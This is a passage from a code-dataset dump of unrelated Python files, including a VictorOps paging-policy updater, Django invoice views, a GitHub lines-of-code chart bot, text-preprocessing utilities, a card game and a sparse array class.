data=json.dumps(payload), headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tuser['pagingPolicy']['steps'] += step\n\t\tprint(user['username'] + ' - 200 - first policy step set.')\n\t\treturn response.status_code\n\n\telse:\n\t\tprint(step)\n\t\tprint(url)\n\t\tprint(response.text)\n\t\tprint(response.status_code)\n\t\treturn False\n\ndef postPpStep(user, step):\n\t#stat timer\n\tt=time.process_time()\n\n\tpayload = buildUserStep(user, step)\n\n\turl = userPpUrl + user['username'] + \"/policies\"\n\n\tresponse = requests.request(\"POST\", url, data=json.dumps(step), headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . 
.')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"POST\", url, data=json.dumps(step), headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tprint(user['username'] + ' - 200 - policy step [' + str(step['index']) + '] set.') \n\t\tuser['pagingPolicy']['steps'] += step\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to post paging policy - ' + str(response.status_code) + '\\n----------\\n')\n\t\tprint(response.text)\n\t\tprint(step)\n\ndef buildUserStep(user, step):\n\t#This function crafts the user-specific paging policy step to include the first \n #\t{\n # \"index\": 0,\n # \"timeout\": 15,\n # \"rules\": [\n # {\n # \"index\": 0,\n # \"type\": \"push\"\n # }\n # ]\n # }\n\tpayload = dict(step)\n\tdel payload['index']\n\tfor rule in payload['rules']:\n\t\t#check to verify that user actually has a phone number as their contact methods.\n\t\tif (rule['type'] == 'sms' or rule['type'] == 'phone') and (len(user['contactMethods']['phones']['contactMethods']) > 0):\n\t\t\t#there is a phone number in the user profile, but is it verified?\n\t\t\tfor number in user['contactMethods']['phones']['contactMethods']:\n\t\t\t\tif number['verified'] == 'verified':\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'Phone',\n\t\t\t\t\t\t'id': user['contactMethods']['phones']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tprint(user['username'] + ' - ' + number['value'] + ' is not verified, defaulting to email.')\n\t\t\t\t\trule['type'] = \"email\"\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'email',\n\t\t\t\t\t\t'id': user['contactMethods']['emails']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t#if type is email or there are no phone numbers present default to email\n\t\telif rule['type'] == 'email' or ((rule['type'] == 'sms'or rule['type'] == 'phone') and (len(user['contactMethods']['phones']['contactMethods']) == 0)):\n\t\t\t#if email is not verified, default to push\n\t\t\tif len(user['contactMethods']['phones']['contactMethods']) == 0:\n\t\t\t\tprint(user['username'] + ' - no phone number is present, defaulting to email.') \n\t\t\tfor email in user['contactMethods']['emails']['contactMethods']:\n\t\t\t\tif email['verified'] == 'verified':\n\t\t\t\t\trule['contact'] = {\n\t\t\t\t\t\t'type': 'email',\n\t\t\t\t\t\t'id': user['contactMethods']['emails']['contactMethods'][0]['id']\n\t\t\t\t\t}\n\t\t\t\t#if the email is not verified, default to push\n\t\t\t\telse:\n\t\t\t\t\tprint(user['username'] + ' - ' + email['value'] + ' is not verified, defaulting to push.')\n\t\t\t\t\trule['type'] = 'push'\n\t\t#this would be for a push, shouldn't need to add a contact id, since it goes to all devices\n\t\telse:\n\t\t\tprint('should be a push')\n\t\t\tpass\n\treturn payload\n\ndef getContactMethods(user):\n\tt = time.process_time()\n\n\turl = \"https://api.victorops.com/api-public/v1/user/\" + user['username'] + \"/contact-methods\"\n\n\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . 
.')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\treturn json.loads(response.text)\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to retrieve contactMethods - ' + str(response.status_code) + '\\n----------\\n')\n\t\tprint(response.text)\n\ndef getUserPolicy(user):\n\tt = time.process_time()\n\n\turl = userPpUrl + user['username'] + '/policies'\n\n\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\t#RATE LIMITS\n\twhile response.status_code == 403:\n\t\t#wait until minute has passed\n\t\twait = t + 5 - time.process_time()\n\t\tprint('waiting ', str(wait), 'seconds. . .')\n\t\ttime.sleep(wait)\n\t\t#reset timer to current time\n\t\tt = time.process_time()\n\n\t\t#retry\n\t\tresponse = requests.request(\"GET\", url, headers=headersPub)\n\n\tif response.status_code == 200:\n\t\t#return list of usernames\n\t\tpolicy = json.loads(response.text)\n\t\tdel policy['_selfUrl']\n\t\treturn policy\n\t\t\n\t#NON-RATE LIMIT FAILURE\n\telse:\n\t\tprint(user['username'] + ' - Failed to retrieve pagingPolicy - ' + str(response.status_code))\n\t\tprint(str(response.text) + '\\n----------\\n')\n\ndef main():\n\t#get all the users\n\tusers = getUsers()\n\n\t#attach contact methods and existing policy to all users\n\tfor user in users:\n\t\tuser['contactMethods'] = getContactMethods(user)\n\t\tuser['pagingPolicy'] = getUserPolicy(user)\n\t\t#print '\\t' + user['username'] + ' contact and paging information retrieved.'\n\n\t#print users\n\n\t#clear existing paging policies\n\tfor user in users:\n\t\tuser['pagingPolicy'] = clearPp(user)\n\t\t#print '\\t' + user['username'] + ' paging policy cleared.'\n\n\t#set template policy for all users\n\tfor user in users:\n\t\tsetUserPp(user, policy)\n\t\t#print '\\t' + user['username'] + ' paging policy set.'\n \nif __name__== \"__main__\":\n\tmain()\n","sub_path":"pagingPolicyTemplate.py","file_name":"pagingPolicyTemplate.py","file_ext":"py","file_size_in_byte":9470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"629218787","text":"import tensorflow as tf\nimport numpy as np\n\ndata = np.array([0.1, 0.2])\nx = tf.placeholder(\"float\", shape=[2])\nT1 = tf.Variable(tf.ones([2,2]))\nl1 = tf.matmul(T1, tf.expand_dims(x, 1))\ninit = tf.initialize_all_variables()\n\nwith tf.Session() as sess:\n sess.run(init)\n sess.run(l1, feed_dict={x: data})","sub_path":"SFData/ICSE2020/s34908033_ground_truth.py","file_name":"s34908033_ground_truth.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638631861","text":"import datetime\n\nfrom djcustomrest.serializers.custom_datetime import serialize_datetime\n\n\ndef serialize_model(model):\n \"\"\"\n\n :type model: models.Model\n \"\"\"\n serialized_model = {}\n for field in model._meta.fields:\n value = getattr(model, field.attname, None)\n if type(value) is not datetime.datetime:\n serialized_model[field.attname] = getattr(model, field.attname,\n None)\n else:\n serialized_model[field.attname] = serialize_datetime(\n getattr(model, field.attname, None)\n )\n return serialized_model\n\n\ndef serialize_qs(qs):\n return list(map(serialize_model, qs))\n\n\ndef serialize_foo(foo):\n result = serialize_model(foo)\n result['bars'] = 
list(map(serialize_model, foo.bars.all()))\n return result\n\ndef serialize_foo_qs(qs):\n return list(map(serialize_foo, qs))\n","sub_path":"djcustomrest/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"51019497","text":"import re\nimport os\nimport base64\nimport requests\nfrom github import Github, InputGitAuthor\nimport datetime\nfrom string import Template\nimport matplotlib.pyplot as plt\nfrom io import StringIO, BytesIO\nfrom dotenv import load_dotenv\nimport time\n\nfrom make_bar_graph import BarGraph\n\n\nclass LinesOfCode:\n\n def __init__(self, id, username, ghtoken, repositoryData):\n self.id = id\n self.username = username\n\n self.g = Github(ghtoken)\n self.headers = {\"Authorization\": \"Bearer \" + ghtoken}\n self.repositoryData = repositoryData\n\n def calculateLoc(self):\n result = self.repositoryData\n yearly_data = {}\n for repo in result['data']['user']['repositories']['edges']:\n self.getCommitStat(repo['node'], yearly_data)\n time.sleep(0.7)\n return yearly_data\n\n def plotLoc(self, yearly_data):\n graph = BarGraph(yearly_data)\n graph.build_graph()\n self.pushChart()\n\n def run_query_v3(self, endPoint):\n # print(endPoint)\n request = requests.get(endPoint, headers=self.headers)\n if request.status_code == 401:\n raise Exception(\"Invalid token {}.\".format(request.status_code))\n elif request.status_code == 204:\n return []\n else:\n return request.json()\n\n def getQuarter(self, timeStamp):\n month = datetime.datetime.fromisoformat(timeStamp).month\n if month >= 1 and month <= 3:\n return 1\n elif month >= 4 and month <= 6:\n return 2\n elif month >= 7 and month <= 9:\n return 3\n elif month >= 10 and month <= 12:\n return 4\n\n def getCommitStat(self, repoDetails, yearly_data):\n commitsURL = 'https://api.github.com/repos/' + repoDetails['nameWithOwner'] + '/commits'\n filteredCommitsEndPoint = commitsURL + '?author=' + self.username\n filteredCommitsResult = self.run_query_v3(filteredCommitsEndPoint)\n # This ignores the error message you get when you try to list commits for an empty repository\n if not type(filteredCommitsResult) == list:\n return\n this_year = datetime.datetime.utcnow().year\n\n for i in range(len(filteredCommitsResult)):\n iso_date = filteredCommitsResult[i][\"commit\"][\"author\"][\"date\"]\n date = re.search(r'\\d+-\\d+-\\d+', iso_date).group(0)\n curr_year = datetime.datetime.fromisoformat(date).year\n # if curr_year != this_year:\n\n individualCommitEndPoint = commitsURL + '/' + filteredCommitsResult[i][\"sha\"]\n individualCommitResult = self.run_query_v3(individualCommitEndPoint)\n\n quarter = self.getQuarter(date)\n if repoDetails['primaryLanguage'] is not None:\n\n if curr_year not in yearly_data:\n yearly_data[curr_year] = {}\n if quarter not in yearly_data[curr_year]:\n yearly_data[curr_year][quarter] = {}\n if repoDetails['primaryLanguage']['name'] not in yearly_data[curr_year][quarter]:\n yearly_data[curr_year][quarter][repoDetails['primaryLanguage']['name']] = 0\n yearly_data[curr_year][quarter][repoDetails['primaryLanguage']['name']] += individualCommitResult[\"stats\"][\"additions\"]\n\n # to find total\n\n # if 'total' not in yearly_data[curr_year]:\n # yearly_data[curr_year]['total']={}\n # if repoDetails['primaryLanguage']['name'] not in yearly_data[curr_year]['total']:\n # yearly_data[curr_year]['total'][repoDetails['primaryLanguage']['name']]=0\n # 
yearly_data[curr_year]['total'][repoDetails['primaryLanguage']['name']]+=(result[i][1]+result[i][2])\n\n def pushChart(self):\n repo = self.g.get_repo(f\"{self.username}/{self.username}\")\n committer = InputGitAuthor('readme-bot', '41898282+github-actions[bot]@users.noreply.github.com')\n with open('bar_graph.png', 'rb') as input_file:\n data = input_file.read()\n try:\n contents = repo.get_contents(\"charts/bar_graph.png\")\n repo.update_file(contents.path, \"Charts Updated\", data, contents.sha, committer=committer)\n except Exception as e:\n repo.create_file(\"charts/bar_graph.png\", \"Charts Added\", data, committer=committer)\n","sub_path":"loc.py","file_name":"loc.py","file_ext":"py","file_size_in_byte":4374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"351965281","text":"import re\r\nimport os\r\nfrom glob import glob\r\nfrom textblob import TextBlob\r\nfrom nltk.corpus import stopwords\r\nfrom nltk import download\r\nfrom tqdm import tqdm\r\n\r\ndef download_preprocessing_prerequisites():\r\n \"\"\"Downloads the NLTK prerequisites needed for other functions\"\"\"\r\n download(\"averaged_perceptron_tagger\") # POS Tags\r\n download(\"stopwords\") # Stop words\r\n download(\"brown\") # Noun phrases\r\n download(\"punkt\") # Noun phrases\r\n\r\n\r\ndef text_blob_from_file(file_path):\r\n \"\"\"Loads a `TextBlob` from `file_path`\"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as text_file:\r\n return TextBlob(text_file.read())\r\n\r\n\r\ndef remove_stop_words(text_blob):\r\n \"\"\"Removes all stop words from `text_blob` and returns the resulting `TextBlob`\"\"\"\r\n # Get words from original text, remove the stop words and combine the\r\n # words again\r\n words = text_blob.words\r\n\r\n stop_words = [stop_word.lower()\r\n for stop_word in stopwords.words(\"english\")]\r\n\r\n words = filter(lambda word: not word.lower() in stop_words, words)\r\n\r\n return TextBlob(\" \".join(words))\r\n\r\n\r\ndef find_noun_phrases(text_blob):\r\n \"\"\"Returns all noun phrases found in `text_blob`\"\"\"\r\n tags = text_blob.tags\r\n\r\n noun_phrases = []\r\n current_noun_phrase = []\r\n current_noun_phrase_pos = []\r\n\r\n # Find the noun phrases sequentially based on the POS tags\r\n\r\n for (word, pos) in tags:\r\n if re.match(\"^[a-zA-Z]*$\", word):\r\n if current_noun_phrase == [] or current_noun_phrase_pos[-1] == \"JJ\":\r\n if pos in [\"NN\", \"NNS\", \"NP\", \"NPS\", \"JJ\"]:\r\n current_noun_phrase.append(word)\r\n current_noun_phrase_pos.append(pos)\r\n else:\r\n if pos in [\"NN\", \"NNS\", \"NP\", \"NPS\"]:\r\n current_noun_phrase.append(word)\r\n current_noun_phrase_pos.append(pos)\r\n else:\r\n if ((len(current_noun_phrase) == 1 and not current_noun_phrase_pos[0] == \"JJ\")\r\n or len(current_noun_phrase) > 1):\r\n noun_phrases.append(\" \".join(current_noun_phrase))\r\n current_noun_phrase = []\r\n current_noun_phrase_pos = []\r\n\r\n return noun_phrases\r\n\r\n\r\ndef link_noun_phrases(text_blob):\r\n \"\"\"Returns a `TextBlob` with all noun phrases in `text_blob` linked by underscores\"\"\"\r\n #noun_phrases = text_blob.noun_phrases\r\n noun_phrases = find_noun_phrases(text_blob)\r\n\r\n # Sort the noun phrases by occurences of spaces so we replace those first\r\n noun_phrases = sorted(noun_phrases, reverse=True,\r\n key=lambda np: np.count(\" \"))\r\n\r\n # Select only noun phrases that don't consist of single words (ie. 
at least a space or hyphen)\r\n # Replace all spaces with underscores and remove hyphens\r\n\r\n replacements = [(np, np.replace(\" \", \"_\").replace(\"-\", \"\")) for np in\r\n filter(lambda word: word.count(\" \") > 0 or word.count(\"-\") > 0, noun_phrases)]\r\n\r\n text_blob_str = str(text_blob)\r\n\r\n for noun_phrase, joined_noun_phrase in replacements:\r\n text_blob_str = text_blob_str.replace(noun_phrase, joined_noun_phrase)\r\n\r\n return TextBlob(text_blob_str)\r\n\r\n\r\ndef convert_wiki_dump(wiki_dump_path, out_path, wiki_extractor_path):\r\n \"\"\"Converts a wikipedia dump at `wiki_dump_path` to multiple text files\r\n saved to `out_path` using the WikiExtractor.py script at `wiki_extractor_path`\"\"\"\r\n print(\"Extracting data from wikidump\")\r\n #os.system(\"python %s %s -b 1000M -q -o %s\" %\r\n # (wiki_extractor_path, wiki_dump_path, out_path))\r\n\r\n print(\"Converting xml to text files\")\r\n _split_wiki_articles(out_path, out_path)\r\n\r\n\r\ndef _get_wiki_article_title(article):\r\n \"\"\"This function finds the article name for an Wikipedia article\"\"\"\r\n title = re.findall(r\"(title=\\\")(.+?)(\\\")\", article)\r\n if len(title) == 0 or len(title[0]) <= 1:\r\n return None\r\n\r\n return title[0][1]\r\n\r\n\r\ndef _split_wiki_articles(raw_article_file_path, article_out_path):\r\n \"\"\"This script is used to split Wikipedia articles extracted from a Wikipedia\r\n dump into seperate files for every article\"\"\"\r\n wiki_files = glob(os.path.join(raw_article_file_path, \"AA\", \"wiki_*\"))\r\n print(\"Found\", len(wiki_files), \"files to process\")\r\n for raw_file_path in wiki_files:\r\n print(\"Processing\", raw_file_path)\r\n with open(raw_file_path, \"r\") as raw_file:\r\n articles = re.split(\" player_two_cards[-1].value:\r\n # Player One gets the cards\r\n player_one.add_card(player_one_cards)\r\n player_one.add_card(player_two_cards)\r\n at_war = False\r\n \r\n elif player_one_cards[-1].value < player_two_cards[-1].value:\r\n # Player One gets the cards\r\n player_two.add_card(player_one_cards)\r\n player_two.add_card(player_two_cards) \r\n at_war = False\r\n\r\n else:\r\n print(\"WAR!!\")\r\n # First check to see if player has enough cards\r\n \r\n if len(player_one.all_cards) < 5:\r\n print(\"Player One unable to play war! Game Over at War\")\r\n print(\"Player Two Wins! Player One Loses!\")\r\n game_on = False\r\n break\r\n \r\n elif len(player_two.all_cards) < 5:\r\n print(\"Player Two unable to play war! Game Over at War\")\r\n print(\"Player One Wins! 
Player One Loses!\")\r\n game_on = False\r\n break\r\n \r\n else:\r\n # Otherwise, we're still at war, so we'll add the next cards 5 cards as per some random rule set\r\n for num in range(5):\r\n player_one_cards.append(player_one.remove_one())\r\n player_two_cards.append(player_two.remove_one()) \r\n \r\n ","sub_path":"Card_Game_Using_Classes.py","file_name":"Card_Game_Using_Classes.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67042012","text":"class SparseArray:\n\n class Pair:\n def __init__(self, key, value):\n self.key = key\n self.value = value\n\n def __init__(self, size=0, default=None):\n self._default = default\n self._list = []\n self._size = size\n self._length = 0\n\n def __len__(self):\n return self._length\n\n def len(self):\n return self._length\n\n def size(self):\n return self._size\n\n def add(self, value):\n if self._length != self._size:\n if value != self._default:\n self._list.append(self.Pair(self._length, value))\n self._length += 1\n else:\n expr = \"SparseArray add(self, value) value = \" + str(value)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Array is too small\")\n\n def getAt(self, index):\n if index > self._size-1:\n expr = \"SparseArray getAt(self, index) index = \" + str(index)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Poinitng Out of an Array\")\n for pair in self._list:\n if index == pair.key:\n return pair.value\n return self._default\n\n def setAt(self, index, value):\n if index > self._size-1:\n expr = \"SparseArray setAt(self, index, value) index = \" + str(index) + \", value = \" + str(value)\n raise OutOfArrayError(expr, \"OutOfArray Exception - Poinitng Out of an Array\")\n for pair in self._list:\n if pair.key == index:\n if value == self._default:\n self._list.remove(pair)\n else:\n pair.value = value\n return\n if value != self._default:\n self._list.append(self.Pair (index, value))\n self._list.sort(lambda a, b: a.key > b.key)\n\nclass Error(Exception):\n pass\n\n\nclass OutOfArrayError(Error):\n def __init__(self, expr, msg):\n self.expr = expr\n self.msg = msg","sub_path":"SparseArray/IgorArray/SparseArray.py","file_name":"SparseArray.py","file_ext":"py","file_size_in_byte":1964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"226651750","text":"# -*- coding: utf-8 -*-\n\n# django imports\nfrom django.shortcuts import render_to_response\nfrom django.http import HttpResponseRedirect, HttpResponse, Http404\nfrom django.template import RequestContext\n\n# django_regnskap imports\nfrom django_regnskap.faktura.models import *\nfrom django_regnskap.faktura.forms import FakturaBetaling\nfrom django_regnskap.faktura.views.fakturaPDF import generate_faktura_pdf\nfrom django_regnskap.regnskap.models import BilagDraft\n\n#general\nimport datetime\n\ndef betal_faktura(request, id):\n if request.method != 'POST':\n raise Exception('Wrong method')\n faktura = Faktura.objects.get(id = id)\n fb = FakturaBetaling(request.POST, prefix ='faktura_betaling' )\n if fb.is_valid() and fb.cleaned_data['faktura_id'] == faktura.id:\n fdata = fb.cleaned_data\n if faktura.getOutstanding() == fdata['belop']:\n bilag_text = u\"Faktura %s Betalt\" % (faktura.getNumber(),)\n faktura.status = 4 # Betalt\n else:\n bilag_text = u\"Faktura %s Delbetaling\" % (faktura.getNumber(),)\n bilag = Bilag(\n dato = fdata['date'],\n beskrivelse = bilag_text,\n external_actor = faktura.kunde,\n prosjekt = 
faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n bilag.save()\n i1 = Innslag(\n bilag = bilag,\n konto = fdata['innbetaling_konto'],\n belop = fdata['belop'],\n type = 0 #debit\n )\n i2 = Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = fdata['belop'],\n type = 1 #kredit\n )\n i1.save()\n i2.save()\n\n faktura.data['log'].append(u\"Betaling registrert (%s kr) %s av %s\"%(fdata['belop'],datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n \n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n\ndef betal_faktura_draft(request, faktura_id, draft_id):\n if request.method != 'POST':\n raise Exception(\"Wrong method\")\n faktura = Faktura.objects.get(id = faktura_id)\n draft = BilagDraft.objects.get(id = draft_id)\n\n if faktura.getOutstanding() == draft.belop:\n bilag_text = u\"Faktura %s Betalt (%s)\" % (faktura.getNumber(),draft.beskrivelse)\n faktura.status = 4 # Betalt\n else:\n bilag_text = u\"Faktura %s Delbetaling (%s)\" % (faktura.getNumber(),draft.beskrivelse)\n\n bilag = Bilag(\n dato = draft.dato,\n beskrivelse = bilag_text,\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n bilag.save()\n i1 = Innslag(\n bilag = bilag,\n konto = draft.konto,\n belop = abs(draft.belop),\n type = int(draft.belop <= 0) #debit == 0\n )\n i2 = Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = abs(draft.belop),\n type = int(draft.belop > 0) #kredit == 1\n )\n i1.save()\n i2.save()\n\n faktura.data['log'].append(u\"Betaling registrert (%s kr) %s av %s\"%(draft.belop,datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n draft.delete()\n\n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n\n# Ikke ferdig!!\ndef kreditnota(request):\n if request.method != 'POST':\n raise Exception(\"Wrong method\")\n faktura = Faktura.objects.get(id = request.POST['faktura_id'])\n faktura.data['log'].append(u\"Kreditnota generert %s av %s\"%(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n\n bilag_ids = tuple([int(b.id) for b in faktura.bilags.all()])\n related_kontos = list(Konto.objects.bilagRelated(bilag_ids=bilag_ids))\n\n bilag = Bilag(\n dato = datetime.datetime.today(),\n beskrivelse = u\"Faktura %s kreditert (slettet/reversert)\" % (faktura.getNumber()),\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt,\n registrerd_by = request.user,\n )\n bilag.related_instance = faktura\n faktura.status\n for konto in related_kontos:\n i = Innslag(\n bilag = bilag,\n konto = konto,\n belop = abs(konto.getLoadedDebit()),\n type = int(konto.getLoadedDebit()<0)\n )\n\n# Ikke ferdig!\ndef purring(request, faktura_id):\n if request.method != 'POST':\n raise Exception(\"Wrong Method\")\n faktura = Faktura.objects.get(id = faktura_id)\n faktura.status = 2 # Purret\n faktura.data['log'].append(u\"Purring generert %s av %s\"%(datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.save()\n return HttpResponseRedirect(faktura.get_absolute_url())\n\ndef show_faktura(request, id):\n faktura = Faktura.objects.get(id = id)\n faktura_betaling_form = FakturaBetaling(prefix='faktura_betaling', initial={'faktura_id':faktura.id, 'innbetaling_konto':faktura.template.innbetaling_konto_id})\n if faktura.status == 0: # Kladdet\n pass\n elif faktura.status == 1: # Sendt\n pass\n elif faktura.status == 2: # Purret\n pass\n 
elif faktura.status == 3: # Inkasso\n pass\n elif faktura.status == 4: # Betalt\n pass\n elif faktura.status == 5: # Slettet\n pass\n bilag_ids = tuple([int(b.id) for b in faktura.bilags.all()])\n related_kontos = list(Konto.objects.bilagRelated(bilag_ids=bilag_ids))\n return render_to_response('show.html',{\n 'faktura' : faktura,\n 'bilags': faktura.bilags.order_by('dato'),\n 'related_kontos': related_kontos,\n 'faktura_betaling_form':faktura_betaling_form,\n 'drafts': BilagDraft.objects.filter(prosjekt=faktura.prosjekt),\n },RequestContext(request))\n\ndef list_faktura(request,prosjekt):\n fakturas = Faktura.objects.filter(prosjekt__navn = prosjekt)\n status = fakturas\n return render_to_response('list.html',{\n 'fakturas' : fakturas.order_by('status','date'),\n 'prosjekt' : prosjekt,\n },RequestContext(request))\n\ndef list_vare(request, prosjekt):\n vares = Vare.objects.raw(\"\"\"SELECT v.*, SUM(fv.price*fv.ammount) AS totalPrice, SUM(fv.ammount) as totalAmmount, YEAR(f.date) as faktura_year FROM faktura_vare AS v LEFT JOIN `faktura_faktura_vare` AS fv ON v.id = fv.vare_id LEFT JOIN faktura_faktura AS f ON f.id = fv.faktura_id GROUP BY v.id, faktura_year ORDER BY faktura_year DESC, v.id\"\"\")\n return render_to_response('list_vare.html',{\n 'vares': vares,\n 'prosjekt' : prosjekt,\n },RequestContext(request))\n\ndef send_faktura(request):\n if request.method != 'POST':\n raise Exception('Wrong method')\n faktura = Faktura.objects.get(id = request.POST['faktura_id'])\n if faktura.status != 0: #kladdet\n raise Http404('Fakturaen har allerede blitt sendt')\n faktura.status = 1 #sendtm\n faktura.assignNumber()\n faktura.data['log'].append(\"Sendt: %s av %s\"% (datetime.datetime.today().strftime('%Y-%m-%d %H:%M:%S'), request.user))\n faktura.data['template'] = faktura.template.get_template_fields()\n bilag = Bilag(\n dato = faktura.date,\n beskrivelse = u\"Faktura %s-%s Sendt\" % (faktura.date.year, faktura.number),\n external_actor = faktura.kunde,\n prosjekt = faktura.prosjekt\n )\n bilag.related_instance = faktura\n bilag.save()\n Innslag(\n bilag = bilag,\n konto = faktura.mellomverende,\n belop = faktura.totalPrice(),\n type = 0, # debit\n ).save()\n konto_cache = {} # summer opp varer som skal på samme konto\n for vare in faktura.fakturavare.all():\n if vare.konto.id in konto_cache:\n konto_cache[vare.konto.id].belop += vare.totalPrice()\n konto_cache[vare.konto.id].save()\n else:\n i = Innslag(\n bilag = bilag,\n konto = vare.konto,\n belop = vare.totalPrice(),\n type = 1, # kredit\n )\n i.save()\n konto_cache[vare.konto.id] = i\n faktura.save()\n bf = BilagFile(\n bilag = bilag\n )\n bf.saveFile(generate_faktura_pdf(faktura),u\"Faktura-%s.pdf\" % faktura.getNumber())\n bf.save()\n return HttpResponseRedirect( '/faktura/show/'+str(faktura.id) )\n","sub_path":"faktura/views/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"105002076","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport random as rnd\nimport numpy as np\nimport pandas as pd\n\ndef calc_direction(agent):\n if agent.x <= agent.min_x or agent.max_x <= agent.x or agent.y <= agent.min_y or agent.max_y <= agent.y:\n return rnd.random() * 180\n else:\n return rnd.random() * 360 # 向きを変える\n\ndef avoid_out_of_range(agent):\n if agent.x < agent.min_x:\n agent.x = agent.min_x\n agent.delta_x = 0\n if agent.y < agent.min_y:\n agent.y = agent.min_y\n agent.delta_y = 0\n if agent.max_x < 
agent.x:\n agent.x = agent.max_x\n agent.delta_x = 0\n if agent.max_y < agent.y:\n agent.y = agent.max_y\n agent.delta_y = 0\n index = [\"x\", \"t\", \"delta_x\", \"delta_y\"]\n list = [agent.x, agent.y, agent.delta_x, agent.delta_y]\n series = pd.Series(list, index = index)\n return series\n\n\ndef min_x(x, radius): # 住民エージェントの行動範囲を制限する\n min_x = x - radius\n if min_x <= 0:\n min_x = 0\n return min_x\n\ndef min_y(y, radius): # 住民エージェントの行動範囲を制限する\n min_y = y - radius\n if min_y <= 0:\n min_y = 0\n return min_y\n\ndef max_x(x, radius, map_size): # 住民エージェントの行動範囲を制限する\n max_x = x + radius\n if map_size < max_x:\n max_x = map_size\n return max_x\n\ndef max_y(y, radius, map_size): # 住民エージェントの行動範囲を制限する\n max_y = y + radius\n if map_size < max_y:\n max_y = map_size\n return max_y\n\ndef get_probability(parameter, num): # BDIによる確率\n if parameter <= 4:\n if num % 4 == 0:\n return 1\n elif parameter <= 7:\n if num % 3 == 0:\n return 2\n else:\n if num % 2 == 0:\n return 3\n return 0\n\ndef calc_motivation(ave, point): # 資産の多さに基づいて,パラメータの数値に影響を与える\n if ave + 500 <= point:\n return 1\n elif ave + 250 <= point:\n return 0.5\n elif point <= ave - 250:\n return -0.5\n elif point <= ave - 500:\n return -1\n return 0\n\ndef calc_direction(agent):\n if agent.x <= agent.min_x or agent.max_x <= agent.x or agent.y <= agent.min_y or agent.max_y <= agent.y:\n return rnd.random() * 180\n else:\n return rnd.random() * 360 # 向きを変える\n\n\ndef variation(): # ばらつきを持たせる変数を返す\n if rnd.randrange(10) % 2 == 0:\n return 1 + rnd.uniform(0, 0.2)\n else:\n return rnd.uniform(0, 0.8)\n","sub_path":"calculate_util.py","file_name":"calculate_util.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"642722511","text":"#!/usr/bin/env python3\n\"\"\"Demonstrate chevron's support for lambdas.\"\"\"\nimport textwrap\nfrom typing import Callable\n\nimport chevron\n\n\ndef main() -> None:\n \"\"\"Implement the business logic described in this module's docstring.\"\"\"\n template = \"\"\"\n Mustache supports lambdas. Lambdas are referenced in a template, and defined in the context\n object.\n\n When the compiler encounters a lambda-referencing section tag in a template, it passes the body\n of that section tag to the lambda without evaluating tags. So it is that a lambda can receive\n text like {{#echo}}{{#upper}}this{{/upper}}{{/echo}}.\n\n A lambda may transform the text it receives, e.g. by calling .upper() on\n {{#upper}}this{{/upper}} text.\n\n A lambda may also invoke a mustache compiler on the text it receives. 
